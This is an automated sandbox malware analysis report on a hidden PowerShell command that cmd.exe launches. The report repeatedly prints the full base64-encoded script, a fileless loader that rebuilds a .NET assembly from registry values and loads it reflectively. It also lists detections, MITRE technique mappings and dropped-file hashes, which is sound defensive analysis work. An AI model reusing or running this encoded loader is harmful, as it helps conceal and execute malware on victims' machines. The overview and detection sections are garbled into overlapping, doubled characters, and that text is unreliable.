Automated Malware Analysis Report

ID: 431253 Cookbook: defaultwindowscmdlinecookbook.jbs Time: 15:50:42 Date: 08/06/2021 Version: 32.0.0 Black Diamond Table of Contents

Table of Contents 2 Analysis Report 3 Overview 3 General Information 3 Detection 3 Signatures 3 Classification 3 Process Tree 3 Malware Configuration 3 Yara Overview 3 Sigma Overview 4 System Summary: 4 Signature Overview 4 System Summary: 4 Data Obfuscation: 4 HIPS / PFW / Operating System Protection Evasion: 4 Mitre Att&ck Matrix 4 Behavior Graph 4 Screenshots 5 Thumbnails 5 Antivirus, Machine Learning and Genetic Malware Detection 6 Initial Sample 6 Dropped Files 6 Unpacked PE Files 6 Domains 6 URLs 6 Domains and IPs 7 Contacted Domains 7 URLs from Memory and Binaries 7 Contacted IPs 7 General Information 7 Simulations 7 Behavior and APIs 7 Joe Sandbox View / Context 8 IPs 8 Domains 8 ASN 8 JA3 Fingerprints 8 Dropped Files 8 Created / dropped Files 8 Static File Info 9 No static file info 9 Network Behavior 9 Code Manipulations 9 Statistics 10 Behavior 10 System Behavior 10 Analysis Process: cmd.exe PID: 6912 Parent PID: 4972 10 General 10 File Activities 10 Analysis Process: conhost.exe PID: 6920 Parent PID: 6912 10 General 10 Analysis Process: powershell.exe PID: 6964 Parent PID: 6912 11 General 11 File Activities 11 File Created 11 File Deleted 11 File Written 11 File Read 11 Disassembly 11 Code Analysis 11

Overview

General Information Detection Signatures Classification

Analysis ID: 431253 EEnnccrrryyppttteedd ppoowweerrrsshheellllll ccmddllliiinnee oopptttiiioonn… Infos: SESiiniggcmryaap dtdeeedttte epccotttewedde::: r SsShuuesslppl iicicmiiiooduulssin PPeo oowwpeetirrorSSn… Most interesting Screenshot: SSuiugssmppiaiicc iiidooeuutsse pcptooewwde:e rrSrssuhhseeplllllli ccioomusm Paaonnwdd e llliirinnSee…

Ransomware ASAbubnsnoporirrcmioaaulll s hh iipiggohhw CCePrPsUUh e UUlls scaaoggmeemand line Miner Spreading

CACobonntotaariminnsas ll loohnnigggh s sClleePeeUpps sU ((>s>a==g 33e miinn)) CCoonntttaaiiinnss llloonngg ssllleeeeppss (((>>== 33 miiinn))) mmaallliiiccciiioouusss malicious

Evader Phishing

sssuusssppiiiccciiioouusss CCrroreenaattatteeinss s aa l oppnrrrogoc cseelsesses piiinns ss(u>us=sp p3ee nmnddiened)d moo… suspicious

cccllleeaann

clean ECEnrneaaabbtllleess add eepbbruougcge ppsrrrsiiiv viiinilllee sggueesspended mo

Exploiter Banker FEFonouaunbndlde asa hdhieiiggbhhu ngnu upmribvbeielerrr g ooefff s Wiiinnddooww /// UUss…

MFoaauyyn ssdllle eaee php i g(((eehvv naaussimiivvebe e llloor ooppf ssW))) tittono d hhoiiinwndd /ee Urrr …s Spyware Trojan / Bot

Adware QMuaueyerr risiieeless e ttthphe e( e vvvooalllusumivee liiionnofffooprrrsm) aatotttiii oohnnin (((dnneaarm … Score: 52 Range: 0 - 100 SQSiiiuggemraiae sdd eethttteecc vttteeoddlu::: m NNeoo nnin IIIfnnotttreemrrraacctitttoiiivvnee ( PnPaoomww…

Whitelisted: false VSVeiegrrrmyy lalloo ndngeg t cecmctdedldlliiinn: eeN oopnptt tiiIionontne ffrfooauucntnidvd,e,, t tthPhiioissw… Confidence: 100% Very long cmdline option found, this

Process Tree

System is w10x64 cmd.exe (PID: 6912 cmdline: cmd /C ''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden -En 'PAAjACAAZQBiAGgAegBvAG8AaQA gACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwA pAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtA FAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7A FsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkA HQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzA C4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHs AJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4 AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGk AKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACA AYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZ QBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= '' MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) powershell.exe (PID: 6964 cmdline: 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden -En 'PAAjACAAZQBiAGgAegBvAG8Aa QAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAK wApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQAL QBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAY wBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAb wByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAd wAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAO wAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMAL gBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJ ABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAc QAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAI gAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZ ABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= ' MD5: DBA3E6449E97D4E3DF64527EF7012A10) cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

System Summary:

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: Non Interactive PowerShell

Signature Overview

Click to jump to signature section

System Summary:

Data Obfuscation:

Suspicious powershell command line found

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Mitre Att&ck Matrix

Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Command Path Process Masquerading 1 OS Security Software Remote Data from Exfiltration Data Eavesdrop on Accounts and Scripting Interception Injection 1 1 Credential Discovery 1 Services Local Over Other Obfuscation Insecure Interpreter 1 Dumping System Network Network Medium Communication Default PowerShell 2 Boot or Boot or Logon Virtualization/Sandbox LSASS Process Discovery 1 Remote Data from Exfiltration Junk Data Exploit SS7 to Accounts Logon Initialization Evasion 2 1 Memory Desktop Removable Over Redirect Phone Initialization Scripts Protocol Media Bluetooth Calls/SMS Scripts Domain At (Linux) Logon Script Logon Script Process Security Virtualization/Sandbox SMB/Windows Data from Automated Steganography Exploit SS7 to Accounts (Windows) (Windows) Injection 1 1 Account Evasion 2 1 Admin Shares Network Exfiltration Track Device Manager Shared Location Drive Local At (Windows) Logon Script Logon Script Deobfuscate/Decode NTDS Application Window Distributed Input Scheduled Protocol SIM Card Accounts (Mac) (Mac) Files or Information 1 Discovery 1 Component Capture Transfer Impersonation Swap Object Model Cloud Cron Network Network Software Packing LSA System Information SSH Keylogging Data Fallback Manipulate Accounts Logon Script Logon Script Secrets Discovery 1 1 Transfer Channels Device Size Limits Communication

Behavior Graph

ID: 431253 Process

Cookbook: defaultwindowscmdlinecookbook.jbs Signature

Startdate: 08/06/2021 Created File Architecture: WINDOWS DNS/IP Info Score: 52 Is Dropped

Is Windows Process

Number of created Registry Values

Number of created Files Sigma detected: Suspicious PowerShell Parameter started Visual Basic Substring Delphi

Java

.Net C# or VB.NET cmd.exe C, C++ or other language

Is malicious

Internet 1

Suspicious powershell Encrypted powershell started started command line found cmdline option found

powershell.exe conhost.exe

Screenshots

Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source Detection Scanner Label Link pesterbdd.com/images/Pester.png 0% URL Reputation safe pesterbdd.com/images/Pester.png 0% URL Reputation safe pesterbdd.com/images/Pester.png 0% URL Reputation safe pesterbdd.com/images/Pester.png 0% URL Reputation safe crl.microsoftYk 0% Avira URL Cloud safe

Copyright Joe Security LLC 2021 Page 6 of 11 Source Detection Scanner Label Link www.microsoft.co 0% URL Reputation safe www.microsoft.co 0% URL Reputation safe www.microsoft.co 0% URL Reputation safe www.microsoft.co 0% URL Reputation safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 32.0.0 Black Diamond Analysis ID: 431253 Start date: 08.06.2021 Start time: 15:50:42 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 5m 35s Hypervisor based Inspection enabled: false Report type: light Cookbook file name: defaultwindowscmdlinecookbook.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes analysed: 20 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL Classification: mal52.evad.win@4/4@0/0 EGA Information: Failed HDC Information: Failed HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Warnings: Show All

Simulations

Behavior and APIs

Copyright Joe Security LLC 2021 Page 7 of 11 Time Type Description 15:51:58 API Interceptor 34x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: data Category: dropped Size (bytes): 8003 Entropy (8bit): 4.839308921501875 Encrypted: false SSDEEP: 192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J MD5: 937C6E940577634844311E349BD4614D SHA1: 379440E933201CD3E6E6BF9B0E61B7663693195F SHA-256: 30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C SHA-512: 6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA Malicious: false Reputation: moderate, very likely benign file Preview: PSMODULECACHE...... <.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1...... Uninstall-Module...... inmo...... fimo...... Install-Module...... New-ScriptFileInfo...... Publish-Module...... Install-Script...... Update-Script...... Find-Command...... Update-ModuleManifest...... Find- DscResource...... Save-Module...... Save-Script...... upmo...... Uninstall-Script...... Get-InstalledScript...... Update-Module...... Register-PSRepository...... Find-Scri pt...... Unregister-PSRepository...... pumo...... Test-ScriptFileInfo...... Update-ScriptFileInfo...... Set-PSRepository...... Get-PSRepository...... Get-InstalledModule...... Find-Module...... Find-RoleCapability...... Publish-Script...... <.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*...... Install-Script...... Save-Module...... Publish-Module...... Find-Module...... Download-Package...... Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjbny5jd.jng.ps1 Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B

Copyright Joe Security LLC 2021 Page 8 of 11 C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjbny5jd.jng.ps1 SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Reputation: high, very likely benign file Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duyhhnd0.owp.psm1 Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Reputation: high, very likely benign file Preview: 1

C:\Users\user\Documents\20210608\PowerShell_transcript.899552.6vnRxYnU.20210608155136.txt Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators Category: dropped Size (bytes): 1265586 Entropy (8bit): 5.548539921381928 Encrypted: false SSDEEP: 768:U7BHHhhdZiD6hhmSZizzpfgps333tttttXXX4pppps////AFFFkPPPppppxdddW5:BtJtJtJg MD5: 6D1B4D23796EA024669054A65493E862 SHA1: 6C8F7B14E03EAFDA4E2EB3D176B17A39058474B6 SHA-256: C99F4F477BAD1FF858AF3BFC5EF2791F7E3F39A7752F8B3C6B8EF8FB1BC70FB2 SHA-512: 952F9F0D7579AB55238864C742263FD93610C264E759A646E9060A7346F97628D4DC18C6F8CD9736E7DDF7570647DE2349B48AEDCC69443ED991067B8DB24923 Malicious: false Reputation: low Preview: .**********************..Windows PowerShell transcript start..Start time: 20210608155148..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 899552 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -En PAAjACAAZQBiAGgAegBvAG8AaQAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAI AAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAe QB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQ AYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhA G0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwA pADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAA

Static File Info

No static file info

Network Behavior

No network behavior found

Code Manipulations

Behavior

Click to jump to process

System Behavior

Analysis Process: cmd.exe PID: 6912 Parent PID: 4972

General

Start time: 15:51:34 Start date: 08/06/2021 Path: C:\Windows\SysWOW64\cmd.exe Wow64 process (32bit): true Commandline: cmd /C ''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden -En 'PAAjACAAZQBiAGgAegBvAG8AaQAgACMAPgAkAHUAPQAkAGUAbgB2ADoAV QBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtA GwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAX ABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7A CQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAe QAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9A DsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAY gBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlA HQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAU wB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiA HkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAI AAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgA CQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAd ABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6A FQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAa QAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9A CAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJ ABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7A GkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAY QBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkA GEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZ QBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvA GEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= '' Imagebase: 0x2a0000 File size: 232960 bytes MD5 hash: F3BDBE3BB6F734E357235F4D5898582D Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities Show Windows behavior

Analysis Process: conhost.exe PID: 6920 Parent PID: 6912

General

Start time: 15:51:34 Start date: 08/06/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff61de10000 File size: 625664 bytes

Copyright Joe Security LLC 2021 Page 10 of 11 MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: powershell.exe PID: 6964 Parent PID: 6912

General

Start time: 15:51:35 Start date: 08/06/2021 Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden -En 'PAAjACAAZQBiAGgAegBvAG8AaQAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUA cgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAg ADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8A RgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9 ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0A cABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1 AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4A ZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQBy ACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIA aQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABl AFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAA MgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABz AC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMA WwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBC AHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAA MgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7 AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8A IAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAg ACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0A fQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgBy AGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwA ZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAo ACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= ' Imagebase: 0xd30000 File size: 430592 bytes MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: high

File Activities Show Windows behavior

File Created

File Deleted

File Written

File Read

Disassembly

Code Analysis